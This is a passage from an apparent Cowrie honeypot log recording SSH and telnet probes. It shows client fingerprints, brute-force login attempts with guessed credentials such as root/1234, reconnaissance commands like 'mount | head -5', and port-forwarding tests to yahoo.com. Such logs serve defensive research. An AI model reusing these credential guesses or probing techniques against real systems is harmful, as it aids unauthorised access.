cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T22:41:08.521080Z","src_ip":"212.227.235.229","session":"f181ab637534"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"09:ce:70:2d:d3:e6:25:a1:b2:6e:ea:db:8b:ba:65:e8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAhsrzuamoXLYvq2YSx3SFmLOLIlXDFVipRlhxEXwPiDNlXQno5GRhrs2KqCTXAZ0dBQ88MvMe1KYT22x+66va47rHf6b+efUX2+0Rh/QtvfDw/kRYXaBKlJK0vaM9Gch5ZQzqKI3Y8QD3oIwglEMQObyNtKflAWdQ5CFCJufQ4y0=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 09:ce:70:2d:d3:e6:25:a1:b2:6e:ea:db:8b:ba:65:e8","sensor":"my-vps","timestamp":"2025-08-26T22:41:08.776750Z","src_ip":"212.227.235.229","session":"f181ab637534"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"09:ce:70:2d:d3:e6:25:a1:b2:6e:ea:db:8b:ba:65:e8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAhsrzuamoXLYvq2YSx3SFmLOLIlXDFVipRlhxEXwPiDNlXQno5GRhrs2KqCTXAZ0dBQ88MvMe1KYT22x+66va47rHf6b+efUX2+0Rh/QtvfDw/kRYXaBKlJK0vaM9Gch5ZQzqKI3Y8QD3oIwglEMQObyNtKflAWdQ5CFCJufQ4y0=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:41:08.777721Z","src_ip":"212.227.235.229","session":"f181ab637534"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"09:ce:70:2d:d3:e6:25:a1:b2:6e:ea:db:8b:ba:65:e8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAhsrzuamoXLYvq2YSx3SFmLOLIlXDFVipRlhxEXwPiDNlXQno5GRhrs2KqCTXAZ0dBQ88MvMe1KYT22x+66va47rHf6b+efUX2+0Rh/QtvfDw/kRYXaBKlJK0vaM9Gch5ZQzqKI3Y8QD3oIwglEMQObyNtKflAWdQ5CFCJufQ4y0=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 09:ce:70:2d:d3:e6:25:a1:b2:6e:ea:db:8b:ba:65:e8","sensor":"my-vps","timestamp":"2025-08-26T22:41:08.865055Z","src_ip":"212.227.235.229","session":"f181ab637534"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"09:ce:70:2d:d3:e6:25:a1:b2:6e:ea:db:8b:ba:65:e8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAhsrzuamoXLYvq2YSx3SFmLOLIlXDFVipRlhxEXwPiDNlXQno5GRhrs2KqCTXAZ0dBQ88MvMe1KYT22x+66va47rHf6b+efUX2+0Rh/QtvfDw/kRYXaBKlJK0vaM9Gch5ZQzqKI3Y8QD3oIwglEMQObyNtKflAWdQ5CFCJufQ4y0=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:41:08.866500Z","src_ip":"212.227.235.229","session":"f181ab637534"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59156,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4d64ce6e17c","protocol":"ssh","message":"New connection: 212.227.235.229:59156 (1.2.3.4:22) [session: d4d64ce6e17c]","sensor":"my-vps","timestamp":"2025-08-26T22:41:17.724150Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:41:18.452878Z","src_ip":"212.227.235.229","session":"f181ab637534"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:41:19.781381Z","src_ip":"212.227.235.229","session":"d4d64ce6e17c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:41:19.782228Z","src_ip":"212.227.235.229","session":"d4d64ce6e17c"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"54321","message":"login attempt [dspace/54321] failed","sensor":"my-vps","timestamp":"2025-08-26T22:41:26.601422Z","src_ip":"212.227.235.229","session":"d4d64ce6e17c"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:41:28.907240Z","src_ip":"212.227.235.229","session":"d4d64ce6e17c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58414,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc5370e81738","protocol":"ssh","message":"New connection: 212.227.125.160:58414 (1.2.3.4:22) [session: bc5370e81738]","sensor":"my-vps","timestamp":"2025-08-26T22:41:37.703452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T22:41:38.458324Z","src_ip":"212.227.125.160","session":"bc5370e81738"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T22:41:39.651759Z","src_ip":"212.227.125.160","session":"bc5370e81738"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:41:45.782152Z","src_ip":"212.227.125.160","session":"bc5370e81738"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21452,"dst_ip":"1.2.3.4","dst_port":23,"session":"77fc7be395f4","protocol":"telnet","message":"New connection: 212.227.235.229:21452 (1.2.3.4:23) [session: 77fc7be395f4]","sensor":"my-vps","timestamp":"2025-08-26T22:41:47.748713Z"}
{"eventid":"cowrie.login.failed","username":"austinpowers","password":"dr3vil1999","message":"login attempt [austinpowers/dr3vil1999] failed","sensor":"my-vps","timestamp":"2025-08-26T22:41:49.805565Z","src_ip":"212.227.235.229","session":"77fc7be395f4"}
{"eventid":"cowrie.session.closed","duration":2.963083267211914,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:41:50.711722Z","src_ip":"212.227.235.229","session":"77fc7be395f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21466,"dst_ip":"1.2.3.4","dst_port":23,"session":"c65d53931df8","protocol":"telnet","message":"New connection: 212.227.235.229:21466 (1.2.3.4:23) [session: c65d53931df8]","sensor":"my-vps","timestamp":"2025-08-26T22:41:50.911167Z"}
{"eventid":"cowrie.login.failed","username":"","password":"root","message":"login attempt [/root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:41:52.909993Z","src_ip":"212.227.235.229","session":"c65d53931df8"}
{"eventid":"cowrie.login.failed","username":"","password":"123","message":"login attempt [/123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:41:55.367170Z","src_ip":"212.227.235.229","session":"c65d53931df8"}
{"eventid":"cowrie.session.closed","duration":5.14227557182312,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:41:56.053371Z","src_ip":"212.227.235.229","session":"c65d53931df8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21482,"dst_ip":"1.2.3.4","dst_port":23,"session":"65352e374d99","protocol":"telnet","message":"New connection: 212.227.235.229:21482 (1.2.3.4:23) [session: 65352e374d99]","sensor":"my-vps","timestamp":"2025-08-26T22:41:56.200590Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:41:58.553436Z","src_ip":"212.227.235.229","session":"65352e374d99"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:41:58.574150Z","src_ip":"212.227.235.229","session":"65352e374d99"}
{"eventid":"cowrie.command.input","input":"echo ECHO_TEST_1756248119157179010","message":"CMD: echo ECHO_TEST_1756248119157179010","sensor":"my-vps","timestamp":"2025-08-26T22:41:59.814223Z","src_ip":"212.227.235.229","session":"65352e374d99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/bb295480f2d554a967ede87bb945c8ac18dfa7e8cb996089e222e03d57460037","size":526,"shasum":"bb295480f2d554a967ede87bb945c8ac18dfa7e8cb996089e222e03d57460037","duplicate":false,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/bb295480f2d554a967ede87bb945c8ac18dfa7e8cb996089e222e03d57460037 after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:42:01.175419Z","src_ip":"212.227.235.229","session":"65352e374d99"}
{"eventid":"cowrie.session.closed","duration":4.9798808097839355,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:42:01.180404Z","src_ip":"212.227.235.229","session":"65352e374d99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49061,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f9b6a0008b9","protocol":"telnet","message":"New connection: 212.227.125.160:49061 (1.2.3.4:23) [session: 5f9b6a0008b9]","sensor":"my-vps","timestamp":"2025-08-26T22:42:10.572585Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":29656,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaa23c1579e4","protocol":"ssh","message":"New connection: 213.108.243.7:29656 (1.2.3.4:22) [session: eaa23c1579e4]","sensor":"my-vps","timestamp":"2025-08-26T22:42:17.063679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:42:17.064592Z","src_ip":"213.108.243.7","session":"eaa23c1579e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:42:17.168450Z","src_ip":"213.108.243.7","session":"eaa23c1579e4"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er45ty6","message":"login attempt [root/1qw23er45ty6] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:42:17.486051Z","src_ip":"213.108.243.7","session":"eaa23c1579e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:42:17.817866Z","src_ip":"213.108.243.7","session":"eaa23c1579e4"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-26T22:42:17.818608Z","src_ip":"213.108.243.7","session":"eaa23c1579e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:42:18.096197Z","src_ip":"213.108.243.7","session":"eaa23c1579e4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:42:18.153985Z","src_ip":"213.108.243.7","session":"eaa23c1579e4"}
{"eventid":"cowrie.session.closed","duration":13.683247089385986,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:42:24.255761Z","src_ip":"212.227.125.160","session":"5f9b6a0008b9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20270,"dst_ip":"1.2.3.4","dst_port":22,"session":"c601e04be1be","protocol":"ssh","message":"New connection: 213.209.150.239:20270 (1.2.3.4:22) [session: c601e04be1be]","sensor":"my-vps","timestamp":"2025-08-26T22:42:38.532179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:42:38.533488Z","src_ip":"213.209.150.239","session":"c601e04be1be"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T22:42:38.580626Z","src_ip":"213.209.150.239","session":"c601e04be1be"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:42:38.815527Z","src_ip":"213.209.150.239","session":"c601e04be1be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":15406,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15406","sensor":"my-vps","timestamp":"2025-08-26T22:42:38.864583Z","session":"c601e04be1be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T22:42:38.911764Z","src_ip":"213.209.150.239","session":"c601e04be1be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":32371,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:32371","sensor":"my-vps","timestamp":"2025-08-26T22:42:39.049610Z","session":"c601e04be1be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T22:42:39.096799Z","src_ip":"213.209.150.239","session":"c601e04be1be"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:42:39.144724Z","src_ip":"213.209.150.239","session":"c601e04be1be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33244,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d9a5c8cc6a0","protocol":"ssh","message":"New connection: 212.227.235.229:33244 (1.2.3.4:22) [session: 2d9a5c8cc6a0]","sensor":"my-vps","timestamp":"2025-08-26T22:43:50.339192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:43:51.357025Z","src_ip":"212.227.235.229","session":"2d9a5c8cc6a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:43:51.358217Z","src_ip":"212.227.235.229","session":"2d9a5c8cc6a0"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"4321","message":"login attempt [dspace/4321] failed","sensor":"my-vps","timestamp":"2025-08-26T22:43:55.055780Z","src_ip":"212.227.235.229","session":"2d9a5c8cc6a0"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:43:57.498922Z","src_ip":"212.227.235.229","session":"2d9a5c8cc6a0"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":20368,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcd4b3edf762","protocol":"ssh","message":"New connection: 80.94.95.15:20368 (1.2.3.4:22) [session: fcd4b3edf762]","sensor":"my-vps","timestamp":"2025-08-26T22:44:15.466706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:44:15.467665Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":